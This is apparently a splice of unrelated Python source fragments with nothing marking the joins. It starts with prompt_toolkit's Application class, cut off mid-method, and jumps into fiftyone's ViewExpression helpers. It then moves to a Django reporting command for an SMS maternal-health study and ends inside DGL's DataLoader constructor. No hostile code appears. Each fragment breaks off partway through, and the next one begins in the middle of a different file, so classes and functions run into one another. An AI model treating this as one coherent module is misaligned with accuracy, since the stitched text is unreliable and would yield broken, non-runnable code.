<reponame>j6k4m8/python-prompt-toolkit<filename>prompt_toolkit/application/application.py<gh_stars>0 from __future__ import unicode_literals from prompt_toolkit.buffer import Buffer from prompt_toolkit.cache import SimpleCache from prompt_toolkit.clipboard import Clipboard, InMemoryClipboard from prompt_toolkit.enums import EditingMode from prompt_toolkit.eventloop import get_event_loop, ensure_future, Return, run_in_executor, run_until_complete, call_from_executor, From from prompt_toolkit.eventloop.base import get_traceback_from_context from prompt_toolkit.filters import to_filter, Condition from prompt_toolkit.input.base import Input from prompt_toolkit.input.defaults import get_default_input from prompt_toolkit.input.typeahead import store_typeahead, get_typeahead from prompt_toolkit.key_binding.bindings.page_navigation import load_page_navigation_bindings from prompt_toolkit.key_binding.defaults import load_key_bindings from prompt_toolkit.key_binding.key_bindings import KeyBindings, ConditionalKeyBindings, KeyBindingsBase, merge_key_bindings, GlobalOnlyKeyBindings from prompt_toolkit.key_binding.key_processor import KeyProcessor from prompt_toolkit.key_binding.emacs_state import EmacsState from prompt_toolkit.key_binding.vi_state import ViState from prompt_toolkit.keys import Keys from prompt_toolkit.layout.controls import BufferControl from prompt_toolkit.layout.dummy import create_dummy_layout from prompt_toolkit.layout.layout import Layout, walk from prompt_toolkit.output import Output, ColorDepth from prompt_toolkit.output.defaults import get_default_output from prompt_toolkit.renderer import Renderer, print_formatted_text from prompt_toolkit.search import SearchState from prompt_toolkit.styles import BaseStyle, default_ui_style, default_pygments_style, merge_styles, DynamicStyle, DummyStyle, StyleTransformation, DummyStyleTransformation from prompt_toolkit.utils import Event, in_main_thread from .current import set_app from .run_in_terminal import run_in_terminal, run_coroutine_in_terminal from subprocess import Popen from traceback import format_tb import os import re import signal import six import sys import time __all__ = [ 'Application', ] class Application(object): """ The main Application class! This glues everything together. :param layout: A :class:`~prompt_toolkit.layout.Layout` instance. :param key_bindings: :class:`~prompt_toolkit.key_binding.KeyBindingsBase` instance for the key bindings. :param clipboard: :class:`~prompt_toolkit.clipboard.Clipboard` to use. :param on_abort: What to do when Control-C is pressed. :param on_exit: What to do when Control-D is pressed. :param full_screen: When True, run the application on the alternate screen buffer. :param color_depth: Any :class:`~.ColorDepth` value, a callable that returns a :class:`~.ColorDepth` or `None` for default. :param erase_when_done: (bool) Clear the application output when it finishes. :param reverse_vi_search_direction: Normally, in Vi mode, a '/' searches forward and a '?' searches backward. In Readline mode, this is usually reversed. :param min_redraw_interval: Number of seconds to wait between redraws. Use this for applications where `invalidate` is called a lot. This could cause a lot of terminal output, which some terminals are not able to process. `None` means that every `invalidate` will be scheduled right away (which is usually fine). When one `invalidate` is called, but a scheduled redraw of a previous `invalidate` call has not been executed yet, nothing will happen in any case. :param max_render_postpone_time: When there is high CPU (a lot of other scheduled calls), postpone the rendering max x seconds. '0' means: don't postpone. '.5' means: try to draw at least twice a second. Filters: :param mouse_support: (:class:`~prompt_toolkit.filters.Filter` or boolean). When True, enable mouse support. :param paste_mode: :class:`~prompt_toolkit.filters.Filter` or boolean. :param editing_mode: :class:`~prompt_toolkit.enums.EditingMode`. :param enable_page_navigation_bindings: When `True`, enable the page navigation key bindings. These include both Emacs and Vi bindings like page-up, page-down and so on to scroll through pages. Mostly useful for creating an editor or other full screen applications. Probably, you don't want this for the implementation of a REPL. By default, this is enabled if `full_screen` is set. Callbacks (all of these should accept a :class:`~prompt_toolkit.application.Application` object as input.) :param on_reset: Called during reset. :param on_invalidate: Called when the UI has been invalidated. :param before_render: Called right before rendering. :param after_render: Called right after rendering. I/O: :param input: :class:`~prompt_toolkit.input.Input` instance. :param output: :class:`~prompt_toolkit.output.Output` instance. (Probably Vt100_Output or Win32Output.) Usage: app = Application(...) app.run() """ def __init__(self, layout=None, style=None, include_default_pygments_style=True, style_transformation=None, key_bindings=None, clipboard=None, full_screen=False, color_depth=None, mouse_support=False, enable_page_navigation_bindings=None, # Can be None, True or False. paste_mode=False, editing_mode=EditingMode.EMACS, erase_when_done=False, reverse_vi_search_direction=False, min_redraw_interval=None, max_render_postpone_time=0, on_reset=None, on_invalidate=None, before_render=None, after_render=None, # I/O. input=None, output=None): # If `enable_page_navigation_bindings` is not specified, enable it in # case of full screen applications only. This can be overridden by the user. if enable_page_navigation_bindings is None: enable_page_navigation_bindings = Condition(lambda: self.full_screen) paste_mode = to_filter(paste_mode) mouse_support = to_filter(mouse_support) reverse_vi_search_direction = to_filter(reverse_vi_search_direction) enable_page_navigation_bindings = to_filter(enable_page_navigation_bindings) include_default_pygments_style = to_filter(include_default_pygments_style) assert layout is None or isinstance(layout, Layout), 'Got layout: %r' % (layout, ) assert key_bindings is None or isinstance(key_bindings, KeyBindingsBase) assert clipboard is None or isinstance(clipboard, Clipboard) assert isinstance(full_screen, bool) assert (color_depth is None or callable(color_depth) or color_depth in ColorDepth._ALL), 'Got color_depth: %r' % (color_depth, ) assert isinstance(editing_mode, six.string_types) assert style is None or isinstance(style, BaseStyle) assert style_transformation is None or isinstance(style_transformation, StyleTransformation) assert isinstance(erase_when_done, bool) assert min_redraw_interval is None or isinstance(min_redraw_interval, (float, int)) assert max_render_postpone_time is None or isinstance(max_render_postpone_time, (float, int)) assert on_reset is None or callable(on_reset) assert on_invalidate is None or callable(on_invalidate) assert before_render is None or callable(before_render) assert after_render is None or callable(after_render) assert output is None or isinstance(output, Output) assert input is None or isinstance(input, Input) if layout is None: layout = create_dummy_layout() if style_transformation is None: style_transformation = DummyStyleTransformation() self.style = style self.style_transformation = style_transformation # Key bindings. self.key_bindings = key_bindings self._default_bindings = load_key_bindings() self._page_navigation_bindings = load_page_navigation_bindings() self.layout = layout self.clipboard = clipboard or InMemoryClipboard() self.full_screen = full_screen self._color_depth = color_depth self.mouse_support = mouse_support self.paste_mode = paste_mode self.editing_mode = editing_mode self.erase_when_done = erase_when_done self.reverse_vi_search_direction = reverse_vi_search_direction self.enable_page_navigation_bindings = enable_page_navigation_bindings self.min_redraw_interval = min_redraw_interval self.max_render_postpone_time = max_render_postpone_time # Events. self.on_invalidate = Event(self, on_invalidate) self.on_reset = Event(self, on_reset) self.before_render = Event(self, before_render) self.after_render = Event(self, after_render) # I/O. self.output = output or get_default_output() self.input = input or get_default_input() # List of 'extra' functions to execute before a Application.run. self.pre_run_callables = [] self._is_running = False self.future = None #: Quoted insert. This flag is set if we go into quoted insert mode. self.quoted_insert = False #: Vi state. (For Vi key bindings.) self.vi_state = ViState() self.emacs_state = EmacsState() #: When to flush the input (For flushing escape keys.) This is important #: on terminals that use vt100 input. We can't distinguish the escape #: key from for instance the left-arrow key, if we don't know what follows #: after "\x1b". This little timer will consider "\x1b" to be escape if #: nothing did follow in this time span. #: This seems to work like the `ttimeoutlen` option in Vim. self.ttimeoutlen = .5 # Seconds. #: Like Vim's `timeoutlen` option. This can be `None` or a float. For #: instance, suppose that we have a key binding AB and a second key #: binding A. If the uses presses A and then waits, we don't handle #: this binding yet (unless it was marked 'eager'), because we don't #: know what will follow. This timeout is the maximum amount of time #: that we wait until we call the handlers anyway. Pass `None` to #: disable this timeout. self.timeoutlen = 1.0 #: The `Renderer` instance. # Make sure that the same stdout is used, when a custom renderer has been passed. self._merged_style = self._create_merged_style(include_default_pygments_style) self.renderer = Renderer( self._merged_style, self.output, self.input, full_screen=full_screen, mouse_support=mouse_support, cpr_not_supported_callback=self.cpr_not_supported_callback) #: Render counter. This one is increased every time the UI is rendered. #: It can be used as a key for caching certain information during one #: rendering. self.render_counter = 0 # Invalidate flag. When 'True', a repaint has been scheduled. self._invalidated = False self._invalidate_events = [] # Collection of 'invalidate' Event objects. self._last_redraw_time = 0 # Unix timestamp of last redraw. Used when # `min_redraw_interval` is given. #: The `InputProcessor` instance. self.key_processor = KeyProcessor(_CombinedRegistry(self)) # If `run_in_terminal` was called. This will point to a `Future` what will be # set at the point when the previous run finishes. self._running_in_terminal = False self._running_in_terminal_f = None # Trigger initialize callback. self.reset() def _create_merged_style(self, include_default_pygments_style): """ Create a `Style` object that merges the default UI style, the default pygments style, and the custom user style. """ dummy_style = DummyStyle() pygments_style = default_pygments_style() @DynamicStyle def conditional_pygments_style(): if include_default_pygments_style(): return pygments_style else: return dummy_style return merge_styles([ default_ui_style(), conditional_pygments_style, DynamicStyle(lambda: self.style), ]) @property def color_depth(self): """ Active :class:`.ColorDepth`. """ depth = self._color_depth if callable(depth): depth = depth() if depth is None: depth = ColorDepth.default() return depth @property def current_buffer(self): """ The currently focused :class:`~.Buffer`. (This returns a dummy :class:`.Buffer` when none of the actual buffers has the focus. In this case, it's really not practical to check for `None` values or catch exceptions every time.) """ return self.layout.current_buffer or Buffer(name='dummy-buffer') # Dummy buffer. @property def current_search_state(self): """ Return the current :class:`.SearchState`. (The one for the focused :class:`.BufferControl`.) """ ui_control = self.layout.current_control if isinstance(ui_control, BufferControl): return ui_control.search_state else: return SearchState() # Dummy search state. (Don't return None!) def reset(self): """
whether any of the given expressions evaluate to True. If no expressions are provided, returns False. Examples:: import fiftyone as fo import fiftyone.zoo as foz from fiftyone import ViewField as F dataset = foz.load_zoo_dataset("quickstart") # Create a view that only contains predictions that are "cat" or # highly confident is_cat = F("label") == "cat" is_confident = F("confidence") > 0.95 view = dataset.filter_labels( "predictions", F.any([is_cat, is_confident]) ) print(dataset.count("predictions.detections")) print(view.count("predictions.detections")) Args: exprs: a :class:`ViewExpression` or iterable of :class:`ViewExpression` instances Returns: a :class:`ViewExpression` """ if isinstance(exprs, ViewExpression) or not etau.is_container(exprs): exprs = [exprs] else: exprs = list(exprs) num_exprs = len(exprs) if num_exprs == 0: return ViewExpression(False) if num_exprs == 1: return exprs[0] return ViewExpression({"$or": exprs}) @staticmethod def all(exprs): """Checks whether all of the given expressions evaluate to True. If no expressions are provided, returns True. Examples:: import fiftyone as fo import fiftyone.zoo as foz from fiftyone import ViewField as F dataset = foz.load_zoo_dataset("quickstart") # Create a view that only contains predictions that are "cat" and # highly confident is_cat = F("label") == "cat" is_confident = F("confidence") > 0.95 view = dataset.filter_labels( "predictions", F.all([is_cat, is_confident]) ) print(dataset.count("predictions.detections")) print(view.count("predictions.detections")) Args: exprs: a :class:`ViewExpression` or iterable of :class:`ViewExpression` instances Returns: a :class:`ViewExpression` """ if isinstance(exprs, ViewExpression) or not etau.is_container(exprs): exprs = [exprs] else: exprs = list(exprs) num_exprs = len(exprs) if num_exprs == 0: return ViewExpression(True) if num_exprs == 1: return exprs[0] return ViewExpression({"$and": exprs}) @staticmethod def range(start, stop=None): """Returns an array expression containing the sequence of integers from the specified start (inclusive) to stop (exclusive). If ``stop`` is provided, returns ``[start, start + 1, ..., stop - 1]``. If no ``stop`` is provided, returns ``[0, 1, ..., start - 1]``. Examples:: import fiftyone as fo from fiftyone import ViewField as F dataset = fo.Dataset() dataset.add_samples( [ fo.Sample(filepath="image1.jpg", tags=["a", "b", "c"]), fo.Sample(filepath="image2.jpg", tags=["y", "z"]), ] ) # Populates an `ints` field based on the number of `tags` dataset.add_sample_field("ints", fo.ListField) view = dataset.set_field("ints", F.range(F("tags").length())) print(view.first()) Args: start: the starting value, or stopping value if no ``stop`` is provided stop (None): the stopping value, if both input arguments are provided Returns: a :class:`ViewExpression` """ if stop is None: stop = start start = 0 return ViewExpression({"$range": [start, stop]}) @staticmethod def enumerate(array, start=0): """Returns an array of ``[index, element]`` pairs enumerating the elements of the given expression, which must resolve to an array. Examples:: import fiftyone as fo from fiftyone import ViewField as F dataset = fo.Dataset() dataset.add_samples( [ fo.Sample(filepath="image1.jpg", tags=["a", "b", "c"]), fo.Sample(filepath="image2.jpg", tags=["y", "z"]), ] ) # Populates an `enumerated_tags` field with the enumerated `tag` dataset.add_sample_field("enumerated_tags", fo.ListField) view = dataset.set_field("enumerated_tags", F.enumerate(F("tags"))) print(view.first()) Args: array: a :class:`ViewExpression` that resolves to an array start (0): the starting enumeration index to use Returns: a :class:`ViewExpression` """ expr = ViewExpression.zip( ViewExpression.range(start, stop=start + array.length()), array, ) return array.let_in(expr) @staticmethod def zip(*args, use_longest=False, defaults=None): """Zips the given expressions, which must resolve to arrays, into an array whose ith element is an array containing the ith element from each input array. Examples:: import fiftyone as fo from fiftyone import ViewField as F dataset = fo.Dataset() dataset.add_samples( [ fo.Sample( filepath="image1.jpg", tags=["a", "b", "c"], ints=[1, 2, 3, 4, 5], ), fo.Sample( filepath="image2.jpg", tags=["y", "z"], ints=[25, 26, 27, 28], ), ] ) dataset.add_sample_field("tags_ints", fo.ListField) # Populates an `tags_ints` field with the zipped `tags` and `ints` view = dataset.set_field("tags_ints", F.zip(F("tags"), F("ints"))) print(view.first()) # Same as above but use the longest array to determine output size view = dataset.set_field( "tags_ints", F.zip(F("tags"), F("ints"), use_longest=True, defaults=("", 0)) ) print(view.first()) Args: *args: one or more arrays or :class:`ViewExpression` instances resolving to arrays use_longest (False): whether to use the longest array to determine the number of elements in the output array. By default, the length of the shortest array is used defaults (None): an optional array of default values of same length as ``*args`` to use when ``use_longest == True`` and the input arrays are of different lengths. If no defaults are provided and ``use_longest == True``, then missing values are set to ``None`` Returns: a :class:`ViewExpression` """ if not use_longest: return ViewExpression({"$zip": {"inputs": list(args)}}) zip_expr = {"inputs": list(args), "useLongestLength": True} if defaults is not None: zip_expr["defaults"] = defaults return ViewExpression({"$zip": zip_expr}) # Experimental expressions ############################################### def _function(self, function): function = " ".join(function.split()) return ViewExpression( {"$function": {"body": function, "args": [self], "lang": "js"}} ) class ViewField(ViewExpression): """A :class:`ViewExpression` that refers to a field or embedded field of a document. You can use `dot notation <https://docs.mongodb.com/manual/core/document/#dot-notation>`_ to refer to subfields of embedded objects within fields. When you create a :class:`ViewField` using a string field like ``ViewField("embedded.field.name")``, the meaning of this field is interpreted relative to the context in which the :class:`ViewField` object is used. For example, when passed to the :meth:`ViewExpression.map` method, this object will refer to the ``embedded.field.name`` object of the array element being processed. In other cases, you may wish to create a :class:`ViewField` that always refers to the root document. You can do this by prepending ``"$"`` to the name of the field, as in ``ViewField("$embedded.field.name")``. Examples:: from fiftyone import ViewField as F # Reference the root of the current context F() # Reference the `ground_truth` field in the current context F("ground_truth") # Reference the `label` field of the `ground_truth` object in the # current context F("ground_truth.label") # Reference the root document in any context F("$") # Reference the `label` field of the root document in any context F("$label") # Reference the `label` field of the `ground_truth` object in the root # document in any context F("$ground_truth.label") .. automethod:: __eq__ .. automethod:: __ge__ .. automethod:: __gt__ .. automethod:: __le__ .. automethod:: __lt__ .. automethod:: __ne__ .. automethod:: __and__ .. automethod:: __invert__ .. automethod:: __or__ .. automethod:: __abs__ .. automethod:: __add__ .. automethod:: __ceil__ .. automethod:: __floor__ .. automethod:: __round__ .. automethod:: __mod__ .. automethod:: __mul__ .. automethod:: __pow__ .. automethod:: __sub__ .. automethod:: __truediv__ .. automethod:: __getitem__ Args: name (None): the name of the field, with an optional "$" preprended if you wish to freeze this field to the root document """ def __init__(self, name=None): if name is None: name = "" should_freeze = name.startswith("$") if should_freeze: name = name[1:] super().__init__(name) if should_freeze: self._freeze_prefix("") def __deepcopy__(self, memo): obj = self.__class__() obj._expr = deepcopy(self._expr, memo) obj._prefix = deepcopy(self._prefix, memo) return obj def to_mongo(self, prefix=None): """Returns a MongoDB representation of the field. Args: prefix (None): an optional prefix to prepend to the field name Returns: a string """ if self.is_frozen: prefix = self._prefix if prefix: return prefix + "." + self._expr if self._expr else prefix if self._expr: return "$" + self._expr if self.is_frozen: return "$$ROOT" return "$$CURRENT" class ObjectId(ViewExpression): """A :class:`ViewExpression` that refers to an `ObjectId <https://docs.mongodb.com/manual/reference/method/ObjectId>`_ of a document. The typical use case for this class is writing an expression that involves checking if the ID of a document matches a particular known ID. Example:: from fiftyone import ViewField as F from fiftyone.core.expressions import ObjectId # Check if the ID of the document matches the given ID expr = F("_id") == ObjectId("5f452489ef00e6374aad384a") Args: oid: the object ID string """ def __init__(self, oid): _ = bson.ObjectId(oid) # validates that `oid` is valid value super().__init__(oid) def to_mongo(self, prefix=None): """Returns a MongoDB representation of the ObjectId. Args: prefix (None): unused Returns: a MongoDB expression """ return {"$toObjectId": self._expr} def _do_to_mongo(val, prefix): if isinstance(val, ViewExpression): return val.to_mongo(prefix=prefix) if isinstance(val, dict): return { _do_to_mongo(k, prefix): _do_to_mongo(v, prefix) for k, v in val.items() } if isinstance(val, list): return [_do_to_mongo(v, prefix) for v in val] if isinstance(val, (date, datetime)): # The arg needs must be float (not int) to avoid errors near the epoch return {"$toDate": fou.datetime_to_timestamp(val)} if isinstance(val, timedelta): return fou.timedelta_to_ms(val) return val def _do_freeze_prefix(val, prefix): def fcn(val): if not val.is_frozen: val._prefix = prefix return _do_recurse(val, fcn) def _do_apply_memo(val, old, new): def fcn(val): if val is old: return new val._expr = _do_apply_memo(val._expr, old, new) return val return _do_recurse(val, fcn) def _do_recurse(val, fcn): if isinstance(val, ViewExpression):
date - (id due_date delivery_date)') for p in dd[:5]: self.stdout.write( "\t{0.study_id} {0.due_date} {0.delivery_date} {0.study_group} (weeks {1:.0f})".format( p, p.delta_days() / 7 ) ) self.stdout.write( '\n') # Add edd to dd delta seconds dd_min , dd_max , dd_total , dd_count = None , None , 0 , dd.count() dd_hist = [0 for _ in range(-10,11)] for p in dd: p.dd_delivery_delta = (p.delivery_date - p.due_date).total_seconds() if dd_min is None or dd_min.dd_delivery_delta > p.dd_delivery_delta: dd_min = p if dd_max is None or dd_max.dd_delivery_delta < p.dd_delivery_delta: dd_max = p dd_total += p.dd_delivery_delta dd_weeks = int(p.dd_delivery_delta / 604800) + 10 if dd_weeks < 0: dd_weeks = 0 elif dd_weeks > 20: dd_weeks = 20 dd_hist[dd_weeks] += 1 self.stdout.write( 'Min {:s} (weeks {:.0f}) Max: {:s} (weeks {:.0f}) Average: {:f}'.format( dd_min.study_id , dd_min.dd_delivery_delta/604800 , dd_max.study_id , dd_max.dd_delivery_delta/604800, dd_total/(dd_count*604800) ) ) table = "" for c in range(-10,11): table += ' {:2.0f} '.format(c) table += '\n' + '----'*21 + '\n' for c in dd_hist: table += ' {:2.0f} '.format(c) self.stdout.write(table) # Add ANC Signup Week ll = c_all.filter(study_group='two-way',delivery_date__isnull=False) # ll = c_all.filter(delivery_date__isnull=False) ll_min , ll_max , ll_total , ll_count = None , None , 0 , ll.count() ll_hist = collections.Counter() for p in ll: p.ll_due_delta = (p.delivery_date - p.created.date()).days if ll_min is None or ll_min.ll_due_delta > p.ll_due_delta: ll_min = p if ll_max is None or ll_max.ll_due_delta < p.ll_due_delta: ll_max = p ll_total += p.ll_due_delta ll_hist[ p.ll_due_delta // 7 ] += 1 self.stdout.write( '\n\n **** Signup to EDD Delta ***' ) self.stdout.write( 'Min {:s} (weeks {:.0f}) Max: {:s} (weeks {:.0f}) Average: {:f}'.format( ll_min.study_id , ll_min.ll_due_delta // 7 , ll_max.study_id , ll_max.ll_due_delta // 7, ll_total/(ll_count * 7) ) ) table = "" for c in range( min(ll_hist), 43 ): table += ' {:2.0f} '.format(c) table += '\n' + '----'*21 + '\n' for c in range( min(ll_hist), 43): table += ' {:2.0f} '.format(ll_hist[c]) self.stdout.write(table) # Add delivery to loss delta (weeks) ll = c_all.filter(loss_date__isnull=False) ll_min , ll_max , ll_total , ll_count = None , None , 0 , ll.count() ll_hist = collections.Counter() for p in ll: p.ll_notification_delta = p.delivery_notification_delta if ll_min is None or ll_min.ll_notification_delta > p.ll_notification_delta: ll_min = p if ll_max is None or ll_max.ll_notification_delta < p.ll_notification_delta: ll_max = p ll_total += p.ll_notification_delta ll_hist[ p.ll_notification_delta // 7 ] += 1 self.stdout.write( '\n\n **** Delivery to Loss Date ***' ) self.stdout.write( 'Min {:s} (weeks {:.0f}) Max: {:s} (weeks {:.0f}) Average: {:f}'.format( ll_min.study_id , ll_min.ll_notification_delta // 7 , ll_max.study_id , ll_max.ll_notification_delta // 7, ll_total/(ll_count * 7) ) ) table = "" for c in range( 0 , max(ll_hist.keys())+1 ): table += ' {:2.0f} '.format(c) table += '\n' + '----'*21 + '\n' for c in range( 0 , max(ll_hist.keys())+1 ): table += ' {:2.0f} '.format(ll_hist[c]) self.stdout.write(table) # Add stop date hist ss = c_all.filter(statuschange__new='stopped') ss_min , ss_max , ss_total , ss_count = None , None , 0 , ss.count() ss_hist = collections.Counter() for p in ss: p.ss_notification_delta = p.stopped_study_delta if ss_min is None or ss_min.ss_notification_delta > p.ss_notification_delta: ss_min = p if ss_max is None or ss_max.ss_notification_delta < p.ss_notification_delta: ss_max = p ss_total += p.ss_notification_delta ss_hist[ p.ss_notification_delta // 28 * 4 ] += 1 self.stdout.write( '\n\n **** Study Start To Stop Weeks ***' ) self.stdout.write( 'Min {:s} (weeks {:.0f}) Max: {:s} (weeks {:.0f}) Average: {:f}'.format( ss_min.study_id , ss_min.ss_notification_delta // 7 , ss_max.study_id , ss_max.ss_notification_delta // 7, ss_total/(ss_count * 7) ) ) table = "" for c in range( 0 , max(ss_hist.keys())+1, 4 ): table += ' {:2.0f} '.format(c) table += '\n' + '----'*21 + '\n' for c in range( 0 , max(ss_hist.keys())+1, 4 ): table += ' {:2.0f} '.format(ss_hist[c]) self.stdout.write(table) self.print_delivery_source() def print_delivery_source(self): self.print_header('Participant Delivery Source (control,one-way,two-way)') source_groups = cont.Contact.objects_no_link.filter(delivery_date__isnull=False).order_by().values('facility',\ 'study_group','delivery_source').annotate(count=models.Count('delivery_source')) # for g in source_groups: # print g # return # Piviot Group Counts source_counts = collections.defaultdict(DeliverySourceItem) for g in source_groups: source_counts[g['facility']][g['delivery_source']][g['study_group']] = g['count'] # Print Group Counts self.stdout.write( DeliverySourceItem.header() ) total_row = DeliverySourceItem() for facility, row in source_counts.items(): self.stdout.write( row.row_str(facility) ) total_row += row self.stdout.write( total_row.row_str("Total") ) def print_enrollment(self): self.print_header('Participant Enrollment By Week') c_all = cont.Contact.objects.all() enrollment_counts = collections.OrderedDict() for c in c_all: key = c.created.strftime('%Y-%U') try: enrollment_counts[key][c.facility] += 1 except KeyError as e: enrollment_counts[key] = FacilityRow() enrollment_counts[key][c.facility] += 1 self.stdout.write( "{:^12}{:^12}{:^12}{:^12}{:^12}{:^12}{:^12}{:^12}".format( "Week","Ahero","Bondo","Mathare","Siaya","Rachuonyo","Riruta","Total") ) total_row = FacilityRow() for week , enrollment in enrollment_counts.items(): print week, enrollment, enrollment.total() total_row += enrollment print 'Total ' , total_row , total_row.total() def print_success_times(self): self.print_header('Success Times') participant_message_counts = cont.Contact.objects_no_link.annotate_messages().order_by('-msg_missed')[:13] def display_phone_number(num): participant = participant_message_counts[num-1] return " |\t{!r:<40} O: {:<3} D: {:<3} M: {:<3} I: {:<3}".format( participant, participant.msg_outgoing, participant.msg_delivered, participant.msg_missed, participant.msg_incoming ) self.stdout.write('\n') intervals = [ ['',0], ['<10s',10], ['<30s',30], ['<1m',60], ['<5m',300], ['<10m',600], ['<30m',1800], ['<1h',3600], ['<2h',7200], ['<4h',14400], ['<8h',28800], ['<16h',57600], ['<24h',86400], ['>24h',604800] ] # Add success_dt and filter messages from start of collection: Nov 30, 2016 messages = cont.Message.objects.exclude(external_status='Failed').add_success_dt() for i in range(1,len(intervals)): count = messages.filter( success_dt__range=(intervals[i-1][1],intervals[i][1]) ).count() intervals[i].append(count) self.stdout.write( ' {:>8}: {:<4}{:>15}'.format( intervals[i][0], count, display_phone_number(i) )) print "\tTotal (since Nov 30, 2016): {} Longest Wait: {} (h)".format( messages.filter(success_dt__isnull=False).count(), messages.first().success_dt/3600.0) def print_sim_counts(self): self.print_header('SIM Counts') counts = collections.defaultdict(int) for c in cont.Contact.objects_no_link.annotate_messages(): if c.sim_count <= 1: continue counts[c.study_group] += 1 print "{0.study_id} - {0.facility} - {0.study_group} - {1}: {0.msg_outgoing}-{0.msg_incoming}".format(c,c.created.date()) for conn in c.connection_set.all(): first_message = cont.Message.objects.filter(connection=conn).last() print "{} - {} {}: {}-{}".format( conn, conn.is_primary, first_message.created.date() if first_message is not None else None, cont.Message.objects.filter(connection=conn,is_outgoing=True).count(), cont.Message.objects.filter(connection=conn,is_outgoing=False).count(), ) print '-'*40 , '\n' print counts def print_message_status(self): self.print_header('All Messages By Status') # Print message status print message_status_groups(delta=self.options['message_status']) print "Other Types" status_groups = cont.Message.objects.order_by().values('external_status'). \ exclude(external_status__in=('Success','Sent','Failed')).exclude(is_outgoing=False). \ annotate(count=models.Count('external_status')) for group in status_groups: print "\t{0[external_status]:<30}: {0[count]}".format(group) print "\t{:<30}: {}".format("Total",sum( g['count'] for g in status_groups ) ) print "\nFailed Reasons" reasons = collections.Counter() for msg in cont.Message.objects.filter(is_outgoing=True).exclude(external_status__in=('Success','Sent')): reasons[msg.external_data.get('reason','No Reason')] += 1 for reason , count in reasons.items(): print "\t{:<20}: {}".format(reason,count) print "\t{:<20}: {}".format("Total",sum( reasons.values() ) ) def print_header(self,header): if self.printed: self.stdout.write("") self.printed = True self.stdout.write( "-"*30 ) self.stdout.write( "{:^30}".format(header) ) self.stdout.write( "-"*30 ) ######################################## # SEC::Start CSV Functions ######################################## def make_connection_info_csv(self): ''' Basic csv dump of connection info ''' connections = cont.Connection.objects.filter(contact__isnull=False).order_by('contact__created') file_path = os.path.join(self.options['dir'],'connections.csv') csv_writer = csv.writer(open(file_path,'w')) csv_writer.writerow( ['id','created','sims','group','facility','primary', 'first','last','total','participant','system','success','first_success','last_success' ]) for conn in connections: total = conn.message_set.count() row = [ conn.contact.study_id, conn.contact.created.date(), conn.contact.sim_count, conn.contact.study_group, conn.contact.facility, 1 if conn.is_primary is True else 0, conn.message_set.last().created.date() if total > 0 else '' , conn.message_set.first().created.date() if total > 0 else '', total, conn.message_set.filter(is_outgoing=False).count(), conn.message_set.filter(is_system=True).exclude(translation_status='cust').count(), conn.message_set.filter(is_system=True,external_status='Success').exclude(translation_status='cust').count(), sum(1 for m in conn.message_set.filter(is_system=True).exclude(translation_status='cust').order_by('created')[:5] if m.external_status == 'Success'), sum(1 for m in conn.message_set.filter(is_system=True).exclude(translation_status='cust').order_by('-created')[:5] if m.external_status == 'Success'), ] csv_writer.writerow(row) return file_path def make_sms_status_csv(self): ''' Basic csv dump of connection info ''' file_path = os.path.join(self.options['dir'],'sms_status.csv') csv_writer = csv.writer(open(file_path,'w')) status_keys = [ 'Nurse','Participant','System', 'Spam', 'Success', 'Sent', 'Failed','None', 'AbsentSubscriber', 'UserDoesNotExist', 'DeliveryFailure', 'UserNotProvisioned', 'SystemFailure', 'Message Rejected By Gateway', 'RejectedByGateway', 'UserMTCallBarred', 'GatewayError', 'Rejected', 'Could Not Send', 'Unexpected Gateway Error', 'UserBusyForMTSms', ] def get_default_row(): return {key:0 for key in status_keys} weeks = collections.defaultdict(get_default_row) def get_msg_week(msg): created = msg.created.date() return str(created - datetime.timedelta(days=created.isoweekday()%7)) messages = cont.Message.objects.all().prefetch_related('contact') for msg in messages: week = weeks[get_msg_week(msg)] if msg.contact is None: week['Spam'] += 1 elif msg.contact.study_group != 'two-way': continue elif msg.is_system: week['System'] += 1 if msg.external_status in ['Success', 'Sent']: week[msg.external_status] += 1 else: week['Failed'] += 1 week[str(msg.reason)] += 1 elif msg.is_outgoing: week['Nurse'] += 1 else: week['Participant'] += 1 # Write header row csv_writer.writerow( ['week'] + status_keys ) # write all weeks for week in sorted(weeks.keys()): csv_writer.writerow([week] + [weeks[week][key] for key in status_keys]) return file_path def make_languages_csv(self): file_path = os.path.join(self.options['dir'],'language_prefs.csv') csv_writer = csv.writer(open(file_path,'w')) contacts = cont.Contact.objects_no_link.annotate( msgs_sent=utils.sql_count_when(message__is_outgoing=False), msgs_system=utils.sql_count_when(message__is_system=True), ).order_by('facility','study_group','language','study_id') def add_stats(c): c.msgs_english , c.msgs_swahili, c.msgs_luo, c.msgs_sheng = 0 , 0 , 0 ,0 for m in c.message_set.all(): if 'english' in m.languages: c.msgs_english += 1 if 'swahili' in m.languages: c.msgs_swahili += 1 if 'luo' in m.languages: c.msgs_luo += 1 if 'sheng' in m.languages: c.msgs_sheng += 1 return c columns = collections.OrderedDict([ ('study_id','study_id'), ('facility','facility'), ('study_group','study_group'), ('language','language'), ('msgs_sent','msgs_sent'), ('msgs_system','msgs_system'), ('msgs_english','msgs_english'), ('msgs_swahili','msgs_swahili'), ('msgs_luo','msgs_luo'), ('msgs_sheng','msgs_sheng'), ]) make_csv(columns,[add_stats(c) for c in contacts],file_path) return file_path def make_hiv_messaging_csv(self): ''' Basic csv dump of hiv messaging status ''' columns = collections.OrderedDict([ ('study_id','study_id'), ('status','status'), ('hiv_messaging','hiv_messaging'), ('hiv_disclosed', null_boolean_factory('hiv_disclosed')),
a single-GPU and the whole graph fits in GPU memory. * If the input graph :attr:`g` is on CPU while the output device :attr:`device` is GPU, then depending on the value of :attr:`use_uva`: - If :attr:`use_uva` is set to True, the sampling and subgraph construction will happen on GPU even if the GPU itself cannot hold the entire graph. This is the recommended setting unless there are operations not supporting UVA. :attr:`num_workers` must be 0 in this case. - Otherwise, both the sampling and subgraph construction will take place on the CPU. """ def __init__(self, graph, indices, graph_sampler, device=None, use_ddp=False, ddp_seed=0, batch_size=1, drop_last=False, shuffle=False, use_prefetch_thread=None, use_alternate_streams=None, pin_prefetcher=None, use_uva=False, use_cpu_worker_affinity=False, cpu_worker_affinity_cores=None, **kwargs): # (BarclayII) PyTorch Lightning sometimes will recreate a DataLoader from an existing # DataLoader with modifications to the original arguments. The arguments are retrieved # from the attributes with the same name, and because we change certain arguments # when calling super().__init__() (e.g. batch_size attribute is None even if the # batch_size argument is not, so the next DataLoader's batch_size argument will be # None), we cannot reinitialize the DataLoader with attributes from the previous # DataLoader directly. # A workaround is to check whether "collate_fn" appears in kwargs. If "collate_fn" # is indeed in kwargs and it's already a CollateWrapper object, we can assume that # the arguments come from a previously created DGL DataLoader, 